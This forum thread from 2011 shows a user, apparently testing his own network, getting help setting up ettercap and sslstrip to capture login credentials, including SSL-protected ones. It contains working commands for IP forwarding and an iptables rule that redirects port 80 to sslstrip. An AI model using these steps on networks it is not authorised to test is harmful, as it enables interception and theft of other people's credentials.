gandaran Posted June 22, 2011 Share Posted June 22, 2011 Hi, I'm trying ettercap on my network and I can capture uncrypted username and passwords, I have followed a lot of video tutorials claiming they can capture SSL encrypted username and passwords but it doesn't work here using Ubuntu 11.04, so whats the secret? how do you do it? thanks Quote Link to comment Share on other sites More sharing options...
Jamo Posted June 22, 2011 Share Posted June 22, 2011 what tutorials? For https you need sslstrip. Quote Link to comment Share on other sites More sharing options...
gandaran Posted June 23, 2011 Author Share Posted June 23, 2011 what tutorials? For https you need sslstrip. so sslstrip is the only way? tried installing sslstrip from http://www.thoughtcrime.org/software/sslstrip/ on ubuntu 11.04 but shows errors running the commands sudo echo "1" > /proc/sys/net/ipv4/ip_forward bash: /proc/sys/net/ipv4/ip_forward: Permission denied mfp@PC:~$ sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort> bash: syntax error near unexpected token `newline' any way to fix this for 11.04? Quote Link to comment Share on other sites More sharing options...
Jason Cooper Posted June 23, 2011 Share Posted June 23, 2011 for the first line try sudo bash -c 'echo "1" > /proc/sys/net/ipv4/ip_forward' for the second line try replacing <listenPort> with the port that sslstrip is listening on. Quote Link to comment Share on other sites More sharing options...
gandaran Posted June 23, 2011 Author Share Posted June 23, 2011 for the first line try sudo bash -c 'echo "1" > /proc/sys/net/ipv4/ip_forward' for the second line try replacing <listenPort> with the port that sslstrip is listening on. the first code worked, no errors at least. and for the port, sorry I don't understand, what is the port number sslstrip listens? also do I have to enter these code lines every-time to run sslstrip? thanks Quote Link to comment Share on other sites More sharing options...
Jason Cooper Posted June 23, 2011 Share Posted June 23, 2011 First read up on the following areas bash (specifically redirection and piping streams) networking (specifically ports and listening services). iptables and redirecting ports then when you understand what port sslstrip is listening on and why you need to redirect port 80 to that port on your local machine you can try sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 Quote Link to comment Share on other sites More sharing options...
gandaran Posted June 23, 2011 Author Share Posted June 23, 2011 (edited) ./sslstrip.py -l 10000 starting sslstrip with the above command outputs these errors Traceback (most recent call last): File "./sslstrip.py", line 108, in <module> main(sys.argv[1:]) File "./sslstrip.py", line 101, in main reactor.listenTCP(int(listenPort), strippingFactory) File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 419, in listenTCP p.startListening() File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 857, in startListening raise CannotListenError, (self.interface, self.port, le) twisted.internet.error.CannotListenError: Couldn't listen on any:10000: [Errno 98] Address already in use. what am I missing? edit: ettercap is freezing now while scanning for hosts, I'm thinking of giving up, how do I undo the two sslstrip code commands? Edited June 23, 2011 by gandaran Quote Link to comment Share on other sites More sharing options...
Jason Cooper Posted June 23, 2011 Share Posted June 23, 2011 First use netstat to see what is currently using port 10000 (do you already have netstat running?) netstat -lp Once you have figured that out then you can either stop the process that is using port 10000 or ask sslstrip to use a port that isn't in use already. If you want to give up then neither of the commands that you have done are permanent so you can restart the machine to clear them out. If you don't want to restart the machine then you can remove the ip_forward option with sudo bash -c 'echo "0" > /proc/sys/net/ipv4/ip_forward' to remove the forwarding rule you can list iptables rules for the nat table with sudo iptables --line-numbers --list PREROUTING --table nat then find the number of the rule you want to remove and use sudo iptables --table nat --delete PREROUTING <ruleNumber> Note: replace <ruleNumber> with the number of the rule you want to delete. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.